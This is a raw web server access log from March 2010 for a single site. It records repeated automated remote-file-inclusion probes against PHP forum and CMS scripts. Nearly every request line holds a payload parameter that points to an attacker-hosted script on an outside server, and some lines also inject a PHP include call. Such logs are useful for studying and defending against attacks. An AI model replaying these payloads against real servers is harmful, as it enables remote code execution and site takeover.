116.127.121.117 - - [03/Mar/2010:05:24:13 -0800] "GET /logs/org/edu/i//skin/zero_vote/ask_password.=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:05:24:13 -0800] "GET /logs/access.log/org/edu/i//skin/zero_vote/ask_password.=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.4.236.8 - - [03/Mar/2010:05:24:19 -0800] "GET /logs/access_100203.log%20%20//////delete_comment.php?board_skin_path=http://www.sclubfever.com/forum/db/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.4.236.8 - - [03/Mar/2010:05:24:19 -0800] "GET /////delete_comment.php?board_skin_path=http://www.sclubfever.com/forum/db/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.4.236.8 - - [03/Mar/2010:05:24:19 -0800] "GET /logs//////delete_comment.php?board_skin_path=http://www.sclubfever.com/forum/db/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:05:24:19 -0800] "GET /logs/access_100205.log/org/edu/i//skin/zero_vote/ask_password.=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.4.236.8 - - [03/Mar/2010:05:24:23 -0800] "GET /logs/access_100206.log%20%20//////delete_comment.php?board_skin_path=http://www.sclubfever.com/forum/db/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:05:24:33 -0800] "GET /logs/access_100126.log//bbs//delete_comment.php?board_skin_path=http://www.formationalliance.com/images/id1.txt??????????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:05:24:42 -0800] "GET /logs/access_100224.log//bbs//delete_comment.php?board_skin_path=http://www.formationalliance.com/images/id1.txt??????????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.4.236.8 - - [03/Mar/2010:05:25:12 -0800] "GET /////delete_comment.php?board_skin_path=http://www.sclubfever.com/forum/db/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.4.236.8 - - [03/Mar/2010:05:25:12 -0800] "GET /logs/access_100203.log//////delete_comment.php?board_skin_path=http://www.sclubfever.com/forum/db/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.4.236.8 - - [03/Mar/2010:05:25:12 -0800] "GET /logs//////delete_comment.php?board_skin_path=http://www.sclubfever.com/forum/db/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:05:25:15 -0800] "GET /bbs/delete_all.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:05:25:15 -0800] "GET /logs//bbs/delete_all.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:05:25:15 -0800] "GET /logs/access_100205.log%20%20//bbs/delete_all.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.4.236.8 - - [03/Mar/2010:05:25:33 -0800] "GET /logs/access_100206.log//////delete_comment.php?board_skin_path=http://www.sclubfever.com/forum/db/iid1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:05:26:07 -0800] "GET /logs/access_100203.log%20%20//bbs/delete_all.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:05:27:20 -0800] "GET /logs/access.log/org/edu/i//skin/zero_vote/ask_password.=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:05:27:20 -0800] "GET /logs/org/edu/i//skin/zero_vote/ask_password.=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:05:27:20 -0800] "GET /org/edu/i//skin/zero_vote/ask_password.=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:05:27:30 -0800] "GET /logs/access_100205.log/org/edu/i//skin/zero_vote/ask_password.=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.111.95.42 - - [03/Mar/2010:05:28:22 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cepp56.com//editor/ts??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.puaga.com"
193.111.95.42 - - [03/Mar/2010:05:28:23 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cepp56.com//editor/ts??? HTTP/1.1" 200 3642 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.puaga.com"
118.168.12.211 - - [03/Mar/2010:05:28:31 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.211 - - [03/Mar/2010:05:28:32 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 200 3626 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.211 - - [03/Mar/2010:05:28:34 -0800] "GET /logs/access_100224.log%20%20//index.php?_REQUEST=&_REQUEST[option]=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.211 - - [03/Mar/2010:05:29:17 -0800] "GET /logs/access_100219.log%20%20//index.php?_REQUEST=&_REQUEST[option]=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [03/Mar/2010:05:31:59 -0800] "GET /skin/happycast_category_lightblack/setup.php?%20dir=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [03/Mar/2010:05:31:59 -0800] "GET /logs/access_100213.log%20%20//skin/happycast_category_lightblack/setup.php?%20dir=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [03/Mar/2010:05:31:59 -0800] "GET /logs//skin/happycast_category_lightblack/setup.php?%20dir=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [03/Mar/2010:05:31:59 -0800] "GET /logs//skin/happycast_category_lightblack/setup.php?%20dir=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [03/Mar/2010:05:31:59 -0800] "GET /logs/access_100213.log%20%20//skin/happycast_category_lightblack/setup.php?%20dir=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [03/Mar/2010:05:31:59 -0800] "GET /skin/happycast_category_lightblack/setup.php?%20dir=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.211 - - [03/Mar/2010:05:32:36 -0800] "GET /logs/access_100224.log%20%20//index.php?_REQUEST=&_REQUEST[option]=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.211 - - [03/Mar/2010:05:32:36 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.211 - - [03/Mar/2010:05:32:36 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 200 3626 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [03/Mar/2010:05:32:54 -0800] "GET /logs/access_100209.log%20%20//skin/happycast_category_lightblack/setup.php?%20dir=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.12.211 - - [03/Mar/2010:05:33:18 -0800] "GET /logs/access_100219.log%20%20//index.php?_REQUEST=&_REQUEST[option]=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [03/Mar/2010:05:33:21 -0800] "GET /logs/access_100209.log%20%20//skin/happycast_category_lightblack/setup.php?%20dir=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.111.95.42 - - [03/Mar/2010:05:33:48 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cepp56.com//editor/ts??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.puaga.com"
193.111.95.42 - - [03/Mar/2010:05:33:48 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cepp56.com//editor/ts??? HTTP/1.1" 200 3642 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.puaga.com"
128.241.54.188 - - [03/Mar/2010:05:34:56 -0800] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
128.241.54.188 - - [03/Mar/2010:05:34:56 -0800] "GET /logs/access_100206.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
128.241.54.188 - - [03/Mar/2010:05:34:56 -0800] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:05:35:13 -0800] "GET /logs/access_100204.log%20%20//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://kucing1.fileave.com/id2.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:05:35:13 -0800] "GET /logs//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://kucing1.fileave.com/id2.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:05:35:13 -0800] "GET /viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://kucing1.fileave.com/id2.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [03/Mar/2010:05:35:17 -0800] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [03/Mar/2010:05:35:17 -0800] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [03/Mar/2010:05:35:17 -0800] "GET /logs/access.log%20%20/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:05:35:26 -0800] "GET /viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://kucing1.fileave.com/id2.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:05:35:26 -0800] "GET /logs//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://kucing1.fileave.com/id2.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:05:35:26 -0800] "GET /logs/access_100204.log%20%20//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://kucing1.fileave.com/id2.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.113 - - [03/Mar/2010:05:35:28 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 200 3626 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.113 - - [03/Mar/2010:05:35:28 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.113 - - [03/Mar/2010:05:35:28 -0800] "GET /logs/access_100224.log%20%20//index.php?_REQUEST=&_REQUEST[option]=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
128.241.54.188 - - [03/Mar/2010:05:35:33 -0800] "GET /logs/access_100214.log%20%20///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:05:35:38 -0800] "GET /logs/access_100215.log%20%20//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://kucing1.fileave.com/id2.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:05:35:44 -0800] "GET /&highlight=%2527.include($_GET[a]),exit.%2527&a=http://kucing1.fileave.com/id2.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:05:35:44 -0800] "GET /logs//&highlight=%2527.include($_GET[a]),exit.%2527&a=http://kucing1.fileave.com/id2.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:05:35:46 -0800] "GET /logs/access_100204.log%20%20//&highlight=%2527.include($_GET[a]),exit.%2527&a=http://kucing1.fileave.com/id2.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:05:35:46 -0800] "GET /&highlight=%2527.include($_GET[a]),exit.%2527&a=http://kucing1.fileave.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:05:35:46 -0800] "GET /logs//&highlight=%2527.include($_GET[a]),exit.%2527&a=http://kucing1.fileave.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:05:35:46 -0800] "GET /logs/access_100204.log%20%20//&highlight=%2527.include($_GET[a]),exit.%2527&a=http://kucing1.fileave.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:05:35:48 -0800] "GET /logs/access_100215.log%20%20//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://kucing1.fileave.com/id2.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [03/Mar/2010:05:35:54 -0800] "GET /logs/access_100217.log%20%20//rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [03/Mar/2010:05:35:54 -0800] "GET /rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [03/Mar/2010:05:35:54 -0800] "GET /logs//rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [03/Mar/2010:05:35:57 -0800] "GET /logs/access_100217.log%20%20//rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [03/Mar/2010:05:35:57 -0800] "GET /logs//rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [03/Mar/2010:05:35:57 -0800] "GET /rsgallery.html.php?mosConfig_absolute_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.168.13.113 - - [03/Mar/2010:05:36:08 -0800] "GET /logs/access_100219.log%20%20//index.php?_REQUEST=&_REQUEST[option]=http://zerozon.co.kr/data/eeng/heheh.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:05:36:19 -0800] "GET /logs/access_100215.log%20%20//&highlight=%2527.include($_GET[a]),exit.%2527&a=http://kucing1.fileave.com/id2.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [03/Mar/2010:05:36:19 -0800] "GET /logs/access.log%20%20/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [03/Mar/2010:05:36:19 -0800] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [03/Mar/2010:05:36:19 -0800] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:05:36:21 -0800] "GET /logs/access_100215.log%20%20//&highlight=%2527.include($_GET[a]),exit.%2527&a=http://kucing1.fileave.com/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [03/Mar/2010:05:36:59 -0800] "GET /logs/access_100225.log%20%20/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.111.95.42 - - [03/Mar/2010:05:37:22 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cepp56.com//editor/ts??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.puaga.com"
193.111.95.42 - - [03/Mar/2010:05:37:22 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cepp56.com//editor/ts??? HTTP/1.1" 200 3642 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.puaga.com"
77.241.83.107 - - [03/Mar/2010:05:37:28 -0800] "GET /logs/access_100213.log//skin/happycast_category_lightblack/setup.php?%20dir=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [03/Mar/2010:05:37:31 -0800] "GET /logs/access_100213.log//skin/happycast_category_lightblack/setup.php?%20dir=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.230.162.220 - - [03/Mar/2010:05:37:55 -0800] "GET /logs/access_100225.log%20%20/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [03/Mar/2010:05:38:20 -0800] "GET /logs/access_100209.log//skin/happycast_category_lightblack/setup.php?%20dir=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.241.83.107 - - [03/Mar/2010:05:38:23 -0800] "GET /logs/access_100209.log//skin/happycast_category_lightblack/setup.php?%20dir=http://www.respektlockswear.com/fx29id.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:05:38:30 -0800] "GET /logs/access_100203.log//bbs/delete_all.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.69.40.227 - - [03/Mar/2010:05:38:30 -0800] "GET /logs/access_100205.log//bbs/delete_all.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:05:40:18 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:05:40:18 -0800] "GET /logs/access_100224.log%20%20//index.php?_REQUEST=&_REQUEST[option]=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:05:40:19 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
216.122.251.114 - - [03/Mar/2010:05:40:57 -0800] "GET /logs/nologa.com/nologa/board/delete_comment.php//delete_comment.php?board_skin_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:05:40:57 -0800] "GET /logs/access_100219.log%20%20//index.php?_REQUEST=&_REQUEST[option]=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.122.251.114 - - [03/Mar/2010:05:40:57 -0800] "GET /nologa.com/nologa/board/delete_comment.php//delete_comment.php?board_skin_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.122.251.114 - - [03/Mar/2010:05:40:58 -0800] "GET /logs/access_100206.log%20%20/nologa.com/nologa/board/delete_comment.php//delete_comment.php?board_skin_path=http://www.patricioeventos.com.br/inscricao2009/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:05:41:40 -0800] "GET /logs/access_100224.log%20%20//index.php?_REQUEST=&_REQUEST[option]=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:05:41:40 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:05:41:40 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
92.60.176.46 - - [03/Mar/2010:05:41:45 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
92.60.176.46 - - [03/Mar/2010:05:42:00 -0800] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
92.60.176.46 - - [03/Mar/2010:05:42:00 -0800] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
92.60.176.46 - - [03/Mar/2010:05:42:00 -0800] "GET /logs/access_100130.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
92.60.176.46 - - [03/Mar/2010:05:42:07 -0800] "GET /logs/access_100206.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
92.60.176.46 - - [03/Mar/2010:05:42:10 -0800] "GET /logs/access_100206.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.111.95.42 - - [03/Mar/2010:05:42:13 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cepp56.com//editor/ts??? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.puaga.com"
193.111.95.42 - - [03/Mar/2010:05:42:13 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.cepp56.com//editor/ts??? HTTP/1.1" 200 3642 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.puaga.com"
116.127.121.117 - - [03/Mar/2010:05:42:35 -0800] "GET /logs/access_100219.log%20%20//index.php?_REQUEST=&_REQUEST[option]=http://www.jondan.co.kr/bbs//skin/ggambo6200_board/one.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.114 - - [03/Mar/2010:05:42:35 -0800] "GET /logs//?path%5Bdocroot%5D=http://www.surfnebraska.net/york/albums/data/sc1?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.114 - - [03/Mar/2010:05:42:35 -0800] "GET /logs/access_100224.log//?path%5Bdocroot%5D=http://www.surfnebraska.net/york/albums/data/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.114 - - [03/Mar/2010:05:42:36 -0800] "GET /?path%5Bdocroot%5D=http://www.surfnebraska.net/york/albums/data/sc1?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
124.217.238.38 - - [03/Mar/2010:05:43:14 -0800] "GET /logs/access_100130.log%20%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.ultratone.com.my/new/idxx.pdf??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
78.110.50.114 - - [03/Mar/2010:05:43:18 -0800] "GET /logs/access_100224.log//?path%5Bdocroot%5D=http://www.surfnebraska.net/york/albums/data/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
